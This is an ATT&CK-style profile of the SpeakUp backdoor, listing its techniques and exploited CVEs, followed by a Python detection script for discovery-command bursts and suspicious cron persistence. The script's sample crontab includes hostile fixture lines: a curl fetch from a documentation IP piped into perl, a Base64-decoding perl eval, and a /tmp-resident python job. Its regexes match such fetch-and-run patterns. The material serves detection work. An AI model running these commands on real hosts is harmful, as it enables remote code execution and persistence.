SpeakUp is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. [1]

ID: S0374
Platforms: Linux, macOS
Version: 1.0

Techniques Used

Domain ID Name Use
Enterprise T1110 Brute Force SpeakUp can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels.[1]
Enterprise T1132 Data Encoding SpeakUp encodes C&C communication using Base64.[1]
Enterprise T1203 Exploitation for Client Execution SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager.[1]
Enterprise T1107 File Deletion SpeakUp deletes files to remove evidence on the machine.[1]
Enterprise T1168 Local Job Scheduling SpeakUp uses cron tasks to ensure persistence.[1]
Enterprise T1046 Network Service Scanning SpeakUp checks for availability of specific ports on servers.[1]
Enterprise T1027 Obfuscated Files or Information SpeakUp encodes its second-stage payload with Base64.[1]
Enterprise T1105 Remote File Copy SpeakUp downloads and executes additional files from a remote server.[1]
Enterprise T1064 Scripting SpeakUp uses Perl and Python scripts.[1]
Enterprise T1071 Standard Application Layer Protocol SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server.[1]
Enterprise T1082 System Information Discovery SpeakUp uses the cat /proc/cpuinfo | grep -c "cpu family" 2>&1 command to gather system information.[1]
Enterprise T1016 System Network Configuration Discovery SpeakUp uses the ifconfig -a command.[1]
Enterprise T1049 System Network Connections Discovery SpeakUp uses the arp -a command.[1]
Enterprise T1033 System Owner/User Discovery SpeakUp uses the whoami command.[1]
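Two groups of rows above translate directly into host-side detection logic: the discovery commands (T1082, T1016, T1049, T1033), which are individually benign but suspicious as a burst from one session, and cron persistence (T1168) that relaunches a Perl or Python stage carrying Base64 (T1027, T1064). The Python below is an added example written for this page, not code from the ATT&CK entry, the Check Point report, or the malware; the execve event format, the crontab contents, the 60-second window, the three-technique threshold and the regex patterns are assumptions chosen for illustration.

```python
"""Hunt for SpeakUp-style discovery bursts and cron persistence in host telemetry.

Added example; not code from the ATT&CK page or from SpeakUp itself.
Assumptions: events are simplified execve records in the form
'ISO_TS host=H sid=S cmd=...' (a constructed format, not a specific
product's schema), and the crontab text is constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands the page attributes to SpeakUp, keyed by technique ID.
DISCOVERY_PATTERNS = {
    "T1082": re.compile(r"cat\s+/proc/cpuinfo"),
    "T1016": re.compile(r"\bifconfig\s+-a\b"),
    "T1049": re.compile(r"\barp\s+-a\b"),
    "T1033": re.compile(r"\bwhoami\b"),
}

def parse_event(line):
    """Parse one constructed execve record; returns None for unparseable lines."""
    m = re.match(r"(\S+) host=(\S+) sid=(\S+) cmd=(.*)$", line)
    if not m:
        return None
    ts, host, sid, cmd = m.groups()
    return {"ts": datetime.fromisoformat(ts), "host": host, "sid": sid, "cmd": cmd}

def find_discovery_clusters(lines, window_s=60, min_techniques=3):
    """Return [((host, sid), [technique IDs])] for sessions that ran at least
    min_techniques distinct discovery commands within window_s seconds.
    A lone `whoami` is noise; the burst is the signal."""
    per_session = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for tid, pat in DISCOVERY_PATTERNS.items():
            if pat.search(ev["cmd"]):
                per_session[(ev["host"], ev["sid"])].append((ev["ts"], tid))
    hits = []
    for key, obs in per_session.items():
        obs.sort()
        for i, (t0, _) in enumerate(obs):
            seen = {tid for t, tid in obs[i:] if t - t0 <= timedelta(seconds=window_s)}
            if len(seen) >= min_techniques:
                hits.append((key, sorted(seen)))
                break
    return hits

# Cron persistence (T1168): match '@reboot cmd' or 'm h dom mon dow cmd'.
CRON_LINE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<cmd>.+)$")
# Heuristics (assumptions): an interpreter job that decodes Base64, a fetch
# piped into an interpreter, or a script launched from /tmp.
SUSPICIOUS_CRON = [
    re.compile(r"\b(perl|python\d?)\b.*(base64|b64decode)", re.IGNORECASE),
    re.compile(r"\b(curl|wget)\b.*\|\s*(?:\S*/)?(sh|bash|perl|python\d?)\b"),
    re.compile(r"/tmp/\S+\.(pl|py)\b"),
]

def suspicious_cron_entries(crontab_text):
    """Return the command field of every crontab line matching a heuristic."""
    found = []
    for raw in crontab_text.splitlines():
        # Skip blanks, comments and environment assignments such as PATH=...
        if not raw.strip() or raw.lstrip().startswith("#") or "=" in raw.split()[0]:
            continue
        m = CRON_LINE.match(raw)
        if not m:
            continue
        cmd = m.group("cmd")
        if any(p.search(cmd) for p in SUSPICIOUS_CRON):
            found.append(cmd)
    return found

# Constructed sample telemetry, not real data. 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = [
    '2019-01-15T10:00:01 host=web01 sid=4 cmd=cat /proc/cpuinfo | grep -c "cpu family" 2>&1',
    "2019-01-15T10:00:02 host=web01 sid=4 cmd=ifconfig -a",
    "2019-01-15T10:00:02 host=web01 sid=4 cmd=arp -a",
    "2019-01-15T10:00:03 host=web01 sid=4 cmd=whoami",
    "2019-01-15T10:05:00 host=web02 sid=9 cmd=whoami",       # lone admin check
    "2019-01-15T11:30:00 host=web02 sid=9 cmd=ifconfig -a",  # far outside the window
]
SAMPLE_CRONTAB = """\
# constructed user crontab for the example
PATH=/usr/local/sbin:/usr/sbin:/usr/bin
0 5 * * * /usr/bin/find /tmp -mtime +7 -delete
*/5 * * * * /usr/bin/perl -MMIME::Base64 -e 'eval(decode_base64("aGVsbG8="))'
@reboot /usr/bin/python /tmp/.cache/update.py
0 3 * * * /usr/bin/curl -s http://198.51.100.7/s.pl | /usr/bin/perl
"""

if __name__ == "__main__":
    for (host, sid), techniques in find_discovery_clusters(SAMPLE_EVENTS):
        print(f"discovery burst on {host} session {sid}: {', '.join(techniques)}")
    for cmd in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"suspicious cron job: {cmd}")
```

On the sample data the discovery check fires only for web01 session 4, where all four commands land within three seconds; web02's two commands are an hour apart and never reach the threshold. The cron check flags the Base64-decoding Perl job, the /tmp-resident Python script and the curl-to-perl pipe while passing the housekeeping `find` job. Tune the window, threshold and patterns to your own baseline before deploying; the values here are illustrative.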